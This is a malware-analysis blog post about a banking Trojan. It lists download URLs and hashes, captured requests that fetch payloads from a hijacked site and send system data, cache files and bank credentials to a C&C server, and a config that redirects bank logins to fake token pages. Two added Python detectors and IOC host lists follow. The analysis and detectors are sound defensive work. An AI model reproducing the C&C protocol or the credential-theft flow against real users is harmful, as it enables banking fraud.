Banking Trojan Uses XML Based Config Files

While doing some work on my new project called AMaDa, I came across a banking Trojan which I’ve never seen before (which doesn’t mean that the Trojan itself has to be new).

The Trojan is being spread by at least two URLs which are most probably hijacked web servers:

URL: http://ihr-XXXXX.de/irs-pdf-f941.irs.com
Filename: irs-pdf-f941.irs.com
File size: 85504 bytes
MD5 : 9465ba350ecbc778b5d14e6f818d6715
SHA1: 484c869dc626db51450964c0089fff36447a3c86
VT result: 25/42 (59.5%)

URL: hXXp://usa-XXXXX.org/download_pdf.html
Filename: download_pdf.com
File size: 44544 bytes
MD5: 32e4bedf5a196d3bbd707737b58eafd0
SHA1: 5660adb2720c3dfa64a184ec9ccc01767780abff
VT result: 31/41 (75.6%)

For now I don’t know the infection vector. I assume that these URLs have most probably been spammed out in July and August 2010. It seems that the AV vendors currently don’t have any name for this kind of malware family. Most of the AV products just detected the files using some heuristic mechanism (Win32:Malware-gen, Heur.Packed.Unknown, Heur.Trojan.Generic, Generic Trojan etc.).

The reason why these malware samples caught my attention is that both binaries download a PDF file from the Internal Revenue Service (IRS) by opening a PDF file located on the IRS website:

The reason why the Trojan displays this PDF file is simple: the victim expected a PDF file from the IRS when he opened the infection binary irs-pdf-f941.irs.com. Because the Trojan displays a PDF from the IRS, the victim will not notice that he just got infected with a banking Trojan. A pretty nice idea from the cybercriminals.

Let’s take a deeper look at the behavior of the Trojan after a successful infection. First of all, the Trojan downloads another binary from a hijacked website in Poland:

GET http://www.psbprzedborz.pl/1.jpg
Filename: 1.jpg
File size: 680960 bytes
MD5: 0b88b5445e6597d2e0f04f0d143baafe
SHA1: af8ce9501c64ad8e559ac01c22a8e5575f3293f8
VT result: 19/42 (45.2%)

Afterwards the Trojan copies the downloaded file into the Windows directory (e.g. on Windows XP):

C:\WINDOWS\inf\alg.exe

Now the Trojan downloads another file from the same hijacked website:

GET http://www.psbprzedborz.pl/2.jpg
Filename: 2.jpg
File size: 790016 bytes
MD5: d79dba50310858b7ab875cc504955d6b
SHA1: d541f35489c5cb703217331ead99ec22597ee3fa
VT result: 18/42 (42.9%)

This time the Trojan puts the downloaded binary at the following file path:

C:\WINDOWS\inf\AcroIEHelper.dll

The Trojan downloads another two files from the following URLs:

GET http://www.psbprzedborz.pl/ChilkatCert_NT4.dll
Filename: ChilkatCert_NT4.dll
File size: 1187840 bytes
MD5: eaaab49836d94f98154608017615d798
SHA1: 8cdc4ee656262fc3465e209dccb9476a6f4c3072
VT result: 15/42 (35.7%)

GET http://www.psbprzedborz.pl/extract_cert.exe
Filename: extract_cert.exe
File size: 425984 bytes
MD5: b24cb5e2e96115eca60b4051fb0a8e68
SHA1: d9df321378027ece3935a646d86a45500b49fa59
VT result: 13/42 (31.0%)

and saves them to the following file paths:

C:\WINDOWS\inf\ChilkatCert_NT4.dll
C:\WINDOWS\inf\extract_cert.exe

These two files are obviously used to steal certificates from Chilkat Software and from the Windows certificate manager. What happens next is… nothing. As long as the user of the infected computer doesn’t open a web browser (e.g. Internet Explorer), the Trojan won’t communicate with the command and control (C&C) server. As soon as the victim opens the web browser, the Trojan begins to talk:

POST /ebb.php HTTP/1.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------081810192853104
Content-Length: 439
Host: 77.78.240.87
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

----------081810192853104
Content-Disposition: form-data; name="cmd"
loadtok

----------081810192853104
Content-Disposition: form-data; name="from"
ie-6.0.2900.5512

----------081810192853104
Content-Disposition: form-data; name="v"
1.0.7

----------081810192853104
Content-Disposition: form-data; name="UID"

[{Windows XP Professional Service Pack 3-COMPUTERNAME-USERNAME}]
----------081810192853104--

As shown above, the Trojan reports its own version (v=1.0.7), the current status (cmd=loadtok), the web browser version (from=ie-6.0.2900.5512) as well as the operating system, computer name and user name (UID) to the C&C server 77.78.240.87, which is located in Bosnia:

IP address: 77.78.240.87
AS number: 42560
AS name: BA-GLOBALNET-AS GlobalNET Bosnia
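To make the check-in above usable for detection, here is an added example (not code from the original post) that parses such a multipart/form-data POST into its fields and scores it against the three traits visible in the capture: the POST to /ebb.php, the Indy Library User-Agent, and the cmd/from/v/UID field set. The sample request is constructed from the capture, with the boundary re-typed in plain ASCII dashes; the field names and values are the ones shown above.

```python
"""Parse the Trojan's multipart/form-data check-in and flag its pattern.

Added example, not code from the original post. Assumes the request layout
shown in the capture: POST /ebb.php, Indy Library User-Agent, and the form
fields cmd / from / v / UID.
"""
import re

# Constructed sample request (re-typed from the capture above). Per RFC 2046
# the body delimiters are "--" followed by the boundary from Content-Type.
SAMPLE_REQUEST = (
    "POST /ebb.php HTTP/1.0\r\n"
    "Connection: keep-alive\r\n"
    "Content-Type: multipart/form-data; boundary=--------081810192853104\r\n"
    "Host: 77.78.240.87\r\n"
    "Accept: text/html, */*\r\n"
    "Accept-Encoding: identity\r\n"
    "User-Agent: Mozilla/3.0 (compatible; Indy Library)\r\n"
    "\r\n"
    "----------081810192853104\r\n"
    'Content-Disposition: form-data; name="cmd"\r\n'
    "\r\n"
    "loadtok\r\n"
    "----------081810192853104\r\n"
    'Content-Disposition: form-data; name="from"\r\n'
    "\r\n"
    "ie-6.0.2900.5512\r\n"
    "----------081810192853104\r\n"
    'Content-Disposition: form-data; name="v"\r\n'
    "\r\n"
    "1.0.7\r\n"
    "----------081810192853104\r\n"
    'Content-Disposition: form-data; name="UID"\r\n'
    "\r\n"
    "[{Windows XP Professional Service Pack 3-COMPUTERNAME-USERNAME}]\r\n"
    "----------081810192853104--\r\n"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body, content_type):
    """Return {field name: value} for a multipart/form-data body."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        return {}
    delimiter = "--" + match.group(1)
    fields = {}
    for part in body.split(delimiter):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble or closing delimiter
            continue
        part_headers, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', part_headers)
        if name:
            fields[name.group(1)] = value.strip("\r\n")
    return fields


BEACON_FIELDS = {"cmd", "from", "v", "UID"}


def classify_beacon(raw):
    """Score one request against the check-in pattern from the capture."""
    method, path, headers, body = parse_request(raw)
    fields = parse_multipart(body, headers.get("content-type", ""))
    indicators = []
    if method == "POST" and path.endswith("/ebb.php"):
        indicators.append("post-to-ebb.php")
    if "indy library" in headers.get("user-agent", "").lower():
        # Weak on its own: many legitimate Delphi programs send this UA.
        indicators.append("indy-library-user-agent")
    if BEACON_FIELDS <= set(fields):
        indicators.append("cmd/from/v/UID-form-fields")
    return {
        "host": headers.get("host", ""),
        "fields": fields,
        "indicators": indicators,
        "suspicious": len(indicators) >= 2,
    }


if __name__ == "__main__":
    print(classify_beacon(SAMPLE_REQUEST))
```

The Indy Library User-Agent alone is not worth an alert, which is why the verdict requires at least two of the three indicators; the field set cmd/from/v/UID combined with the /ebb.php path is the part specific to this family.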

This AS is a well-known source of badness, so the server can be considered bulletproof hosted:

Let’s go back to the Trojan: the reply which the C&C server sends back to the infected client looks quite interesting. It’s an XML file containing the targets of the phishing attack:

HTTP/1.1 200 OK
Server: Apache/2
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>

.
..commercial.XXXXX.com
..Password=
..http://77.78.240.87/tok/commercial.XXXX.com/token.htm
..http://77.78.240.87/tok/commercial.XXXXX.com/under_maintenance.htm
.

.
..chsec.XXXXX.com
..PASSWORD=
..http://77.78.240.87/tok/wellsoffice.XXXXX.com/token.htm
..http://77.78.240.87/tok/wellsoffice.XXXXX.com/under_maintenance.html
.

.
..secure.XXXXX.com
..userid=
..http://91.216.122.60/tok/net.XXXXX.com/token.htm
..http://91.216.122.60/tok/net.XXXXX.com/under_maintenance.htm
.

.
..treasury.XXXXX.com/portal/esec/login
..txtToken=
..http://77.78.240.87/tok/treasury.XXXXX.com/token.htm
..http://77.78.240.87/tok/treasury.XXXXX.com/under_maintenance.htm
.

.
..infoplus.XXXXX.com/
..pin=
..http://77.78.240.87/tok/infoplus.XXXXX.com/token.htm
..http://77.78.240.87/tok/infoplus.XXXXX.com/under_maintenance.htm
.

.
..businessonline.XXXXX.com
..TokenOTP=
..http://77.78.240.87/tok/businessonline.XXXXX.com/token.htm
..http://77.78.240.87/tok/businessonline.XXXXX.com/under_maintenance.htm
.

.
..wellsoffice.XXXXX.com/login/token_passcode
..token_code=
..http://77.78.240.87/tok/wellsoffice.XXXXX.com/token2.htm
..http://77.78.240.87/tok/wellsoffice.XXXXX.com/under_maintenance.html
.

.
...XXXXX.com
..username=
..http://77.78.240.87/tok/direct.XXXXX.com/token.htm
..http://77.78.240.87/tok/direct.XXXXX.com/under_maintenance.htm
.

.
..singlepoint.XXXXX.com
..userid=
..http://77.78.240.87/tok/singlepoint.XXXXX.com/token.htm
..http://77.78.240.87/tok/singlepoint.XXXXX.com/under_maintenance.htm
.

.
..XXXXX.com
..auth_userId=
..http://77.78.240.87/tok/access.XXXXX.com/token.htm
..http://77.78.240.87/tok/access.XXXXX.com/under_maintenance.htm
.

.
..manufacturers.XXXXX.com
..UserPass=
..http://77.78.240.87/tok/manufacturers.XXXXX.com/token.html
..http://77.78.240.87/tok/manufacturers.XXXXX.com/under-maintenance.html
.

.
..gateway.XXXXX.com
..tokenSerialNum=
..http://77.78.240.87/tok/gateway.XXXXX.com/token.html
..http://77.78.240.87/tok/gateway.XXXXX.com/under_maintenance.html
.

.
..treasurypro.XXXXX.com
..UNUSED_send_me_the_page=
..http://google.com
..http://google.com
.

[...]

I’ve censored the names of the banks which are being targeted by this Trojan. But I can say that it looks like all of them are more or less well-known banks in the US. To see what would happen, I visited the login page of an online banking website which is targeted above. I was pretty surprised to see that the Trojan had just stolen the temporary files from the browser cache as well as the saved cookies:

Browser cache (sent to the C&C using HTTP POST):

----------081810192952792
Content-Disposition: form-data; name="cmd"

upload.html
[....]
----------081810192952792
Content-Disposition: form-data; name="file1"; filename="C:\DOCUME~1\XXXX\LOCALS~1\Temp\aboutHtmlPagesblank\1064_1080\1.txt"
Content-Type: text/plain

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="height: 100%">
<head id="ctl00_Head1"><title>Welcome to XXX Bank</title>
[...]

As soon as the victim enters his credentials for the online banking account, the Trojan steals the credentials and sends them to the C&C:

----------081810193250557
Content-Disposition: form-data; name="data"

token_code=XXXXX&force_fake_token_field=22&Sign+On=Sign+On.token_code=XXXXX&force_fake_token_field=22&Sign On=Sign On&253D1&TYPE=XXXXX&COMPANY=XXXXX&WFUID=XXXXX&PASSWORD=XXXXX&Sign+On=Sign+On.REALM=XXXXX&DOMAIN=XXXXX&TARGET=

Since each security token can only be used once, the Trojan then displays a fake error message:

The fake error message tries to hide the fact that the credentials which were just entered have been stolen by a banking Trojan.

*** Conclusion ***
In summary, the credentials are stolen as follows:

  • The Trojan gets an XML config file from the C&C server, defining the banks which the Trojan should target. For each bank the config file also contains the URL of a fake token form as well as the URL of a fake error message which is displayed after login.
  • As soon as the victim tries to log in to an online bank defined in the config, the Trojan displays the fake token form.
  • After the victim has entered his credentials, the Trojan steals the credentials and displays the fake error message.
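The steps above leave a recognisable trace in web proxy logs: the infected client fetches the drop files from the hijacked Polish site, then, right after visiting a bank login page, loads /tok/<bank domain>/token*.htm and later /tok/<bank domain>/under_maintenance.htm from the C&C. The following added example (not code from the original post) runs those two checks over constructed proxy log lines. The hosts come from the post; the bank domains are example.com placeholders standing in for the censored names, and the tab-separated log format is an assumption.

```python
"""Spot the fake-token-form / fake-error-page flow in proxy logs.

Added example, not code from the original post. Assumes a tab-separated
log (time, client IP, method, URL); bank domains are placeholders.
"""
import re
from collections import defaultdict

# Hosts named in the post: the drop site and the two C&C servers.
IOC_HOSTS = {"www.psbprzedborz.pl", "77.78.240.87", "91.216.122.60"}

# URL shape of the injected pages listed in the XML config:
#   http://<c&c>/tok/<bank domain>/token[N].htm(l)          fake token form
#   http://<c&c>/tok/<bank domain>/under_maintenance.htm(l) fake error page
INJECT_RE = re.compile(
    r"^https?://([^/]+)/tok/([^/]+)/(token\d*\.html?|under[_-]maintenance\.html?)$",
    re.IGNORECASE,
)

# Constructed proxy log. Bank domains are example.com placeholders.
SAMPLE_LOG = """\
2010-08-18T19:27:10\t10.0.0.23\tGET\thttp://www.psbprzedborz.pl/1.jpg
2010-08-18T19:27:12\t10.0.0.23\tGET\thttp://www.psbprzedborz.pl/2.jpg
2010-08-18T19:30:02\t10.0.0.23\tGET\thttps://wellsoffice.example.com/login/token_passcode
2010-08-18T19:30:03\t10.0.0.23\tGET\thttp://77.78.240.87/tok/wellsoffice.example.com/token2.htm
2010-08-18T19:32:50\t10.0.0.23\tGET\thttp://77.78.240.87/tok/wellsoffice.example.com/under_maintenance.html
2010-08-18T19:33:01\t10.0.0.42\tGET\thttp://www.example.org/index.html
"""


def analyze(log_text):
    """Return {client: [(time, kind, detail, url), ...]} for matching lines.

    kind is "ioc-host" (contact with a known drop/C&C host),
    "fake-token-form" or "fake-error-page" (injected page fetched);
    detail is the host or the targeted bank domain respectively.
    """
    alerts = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split("\t")
        host_match = re.match(r"^https?://([^/]+)", url)
        host = host_match.group(1).lower() if host_match else ""
        if host in IOC_HOSTS:
            alerts[client].append((ts, "ioc-host", host, url))
        inject = INJECT_RE.match(url)
        if inject:
            target = inject.group(2).lower()
            page = inject.group(3).lower()
            kind = "fake-token-form" if page.startswith("token") else "fake-error-page"
            alerts[client].append((ts, kind, target, url))
    return dict(alerts)


def compromised_accounts(alerts):
    """(client, bank domain) pairs for which the fake token form was served.

    Credentials typed on that bank's login page must be treated as stolen.
    """
    return {
        (client, detail)
        for client, items in alerts.items()
        for _ts, kind, detail, _url in items
        if kind == "fake-token-form"
    }


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for client, items in found.items():
        for item in items:
            print(client, *item)
    print("accounts to reset:", compromised_accounts(SAMPLE_LOG and found))
```

The /tok/<bank domain>/ path is the useful part for incident response: it names the bank whose login was intercepted, so the set returned by compromised_accounts tells you which customers' credentials and one-time tokens to treat as burned, not just which machine beaconed.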

The technique used by the Trojan isn’t new; a few other Trojan families use the same method. I can only suggest to all home users: your online bank would never display an error message like “under maintenance due to blabla” after you have logged into your account. Such an error message will always be shown to you before you can enter the credentials to your online banking account!
